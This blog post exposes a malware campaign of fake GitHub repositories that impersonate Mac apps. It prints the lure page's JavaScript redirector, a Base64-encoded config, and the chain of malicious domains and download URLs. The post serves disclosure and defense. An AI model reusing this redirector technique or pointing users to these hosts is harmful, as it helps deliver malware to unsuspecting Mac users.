Previous: Safari 26 changed address bar copying Articles index Jeff Johnson (My apps, PayPal.Me, Mastodon)

September 27 2025

First reported a few weeks ago on Reddit and on Michael Tsai’s blog, this scam unfortunately continues unabated. My own app StopTheMadness Pro has been impersonated on GitHub at least twice. Although a repository that I discovered September 16 was subsequently removed and now returns 404 not found (with no public notice to visitors from GitHub that this was formerly a malware scam), another StopTheMadness Pro copycat is still live on GitHub as of the publication of this blog post.

The search phrase “for macOS” on GitHub reveals countless such fakes, pretending to be well-known Mac apps such as 1Blocker, Airfoil, BBEdit, Figma, Little Snitch, Malwarebytes, OmniOutliner, SoundSource, and VLC Media Player. This is clearly the work of a single person or group, because every repository follows the exact same template and technique. And there’s always a blatant “SEO Keywords” section on the page in order to game search engine results, already exploiting GitHub’s own prominent ranking.

Each scam repository was created by a separate anonymous GitHub user who joined recently, within the last month or two. There’s often a support email address at the top of the page, but the email address is fake and includes the name of the app in the domain to lend legitimacy to the scam.

The download link goes to a GitHub page of a different anonymous GitHub user from the one who created the repository; a huge number of fraudulent GitHub accounts are involved in this scam. The linked page, for example https://thynizaudin.github.io/.github/stopthemadness, contains some JavaScript:

<script>
(async function () {
try {
const res = await fetch(
"https://valbonau.github.io/.github/valbo.nau"
);
if (!res.ok) throw new Error(`Config HTTP ${res.status}`);
const { c } = await res.json();
const url = atob(c);
if (!/^https?:\/\//.test(url)) throw new Error("Invalid URL");
window.location.href = url;
} catch (e) {
console.error(e);
}
})();
</script>

This script loads a URL from, you guessed it, yet another anonymous GitHub account.

{ "c": "aHR0cHM6Ly9wb3BraW5zcG9wLmNvbS8=" }

The result is just some JSON containing a Base64-encoded URL, such as https://popkinspop.com/, which returns an HTTP 302 redirect, to https://volt-apps.com/ewer-lest.html for example. This page gives you the option to “install” the app via Terminal—along with an instructional video!—or download a disk image. The download link goes to a URL such as https://alhodooa.com/get.php?call=stack for example. Note that they claim to be a “Verified Publisher.” Either way, through several more layers of indirection, the victim will eventually run a mysterious Mach-O executable, which I haven’t analyzed but which no doubt is up to no good. I’ll leave malware analysis to security researchers such as Patrick Wardle.

This scam on GitHub is running amok. I’ve reported a few of the fakes myself to GitHub, but I can’t keep up, and that’s not my job. GitHub and Microsoft, the owner of GitHub, need to take decisive and comprehensive action to stop the spread of malware on their platform. Most concerning, I think, is the apparently unlimited ability of an attacker to create and deploy legions of anonymous new GitHub accounts for nefarious purposes.

Jeff Johnson (My apps, PayPal.Me, Mastodon) Articles index Previous: Safari 26 changed address bar copying